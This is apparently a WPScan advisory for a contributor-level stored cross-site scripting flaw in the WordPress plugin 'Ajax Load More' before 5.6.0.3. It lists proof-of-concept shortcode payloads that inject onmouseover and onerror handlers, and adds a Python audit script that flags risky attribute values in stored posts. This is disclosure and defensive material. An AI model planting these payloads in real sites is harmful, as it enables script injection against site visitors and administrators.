wpvulndb | Lana Codes | WPVDB-ID:497D0BF9-B750-4293-9662-1722A74442E2
History: Feb 16, 2023 - 12:00 a.m.

WordPress Infinite Scroll - Ajax Load More < 5.6.0.3 - Contributor+ Stored XSS

2023-02-16 00:00:00
Lana Codes
wpscan.com
10
Tags: wordpress, infinite scroll, ajax load more, plugin, stored xss, vulnerability

EPSS: 0.001 (Low), Percentile: 23.3%

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

PoC

Examples (a lot of attributes are affected!, not just the ones below)

v < 5.6.0.3
[ajax_load_more id='" onmouseover="alert(/XSS-id-1/)"']
[ajax_load_more id='2" src onerror=alert(/XSSid-2/)//']
[ajax_load_more id='a = 1;alert(/XSSid-3/); var b']
[ajax_load_more button_label='"onmouseover=alert(/XSS-button_label/)//']
[ajax_load_more button_loading_label='"onmouseover=alert(/XSS-button_loading_label/)//']
[ajax_load_more button_done_label='"onmouseover=alert(/XSS-button_done_label/)//']

v < 5.6.0.1
[ajax_load_more max_pages='"onmouseover=alert(/XSS-max_pages/)//']

v < 5.6.0
[ajax_load_more repeater='" onmouseover="alert(/XSS/)"']
[ajax_load_more theme_repeater='" onmouseover="alert(/XSS/)"']
[ajax_load_more tag='" onmouseover="alert(/XSS/)"']

v < 5.5.5 (original from submitter)
[ajax_load_more css_classes='" onmouseover="alert(/XSS/)"']
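
An added example, not part of the original advisory or the plugin's code: a Python audit pass over stored post content that flags any ajax_load_more shortcode attribute whose value contains characters able to leave an HTML attribute or inline-script context, so posts saved before the upgrade to 5.6.0.3 can be found and reviewed. The risky-character set, the simplified attribute regex and the sample posts are assumptions constructed for illustration; every attribute is checked because the advisory says many are affected.

```python
import re

# Matches the shortcode tag and captures its raw attribute string.
SHORTCODE = re.compile(r"\[ajax_load_more\b([^\]]*)\]")
# name='v', name="v" or bare name=v (simplified compared with WordPress's parser).
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s'"]+))""")
# Heuristic (assumption): characters that can break out of an HTML attribute
# or an inline-script context. Expect some false positives in free-text labels.
RISKY = re.compile(r"""["'<>`;(=]""")


def parse_attrs(raw):
    """Return {name: value} for one shortcode's attribute string."""
    attrs = {}
    for m in ATTR.finditer(raw):
        # Exactly one of the three value groups matched; take that one.
        value = next(g for g in m.groups()[1:] if g is not None)
        attrs[m.group(1).lower()] = value
    return attrs


def audit_posts(posts):
    """posts: {post_id: post_content}. Returns [(post_id, attr, value), ...]."""
    findings = []
    for post_id, content in posts.items():
        for sc in SHORTCODE.finditer(content):
            for name, value in parse_attrs(sc.group(1)).items():
                if RISKY.search(value):
                    findings.append((post_id, name, value))
    return findings


# Constructed sample content: two strings from the advisory's PoC list
# and one benign use of the shortcode.
SAMPLE_POSTS = {
    101: """Intro [ajax_load_more id='" onmouseover="alert(/XSS-id-1/)"'] outro""",
    102: """[ajax_load_more id="blog-feed" button_label="Load more posts" max_pages="5"]""",
    103: """[ajax_load_more id='a = 1;alert(/XSSid-3/); var b']""",
}

if __name__ == "__main__":
    for post_id, name, value in audit_posts(SAMPLE_POSTS):
        print(f"post {post_id}: attribute {name!r} needs review: {value!r}")
```
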

CPE Name        Operator  Version
ajax-load-more  lt        5.6.0.3
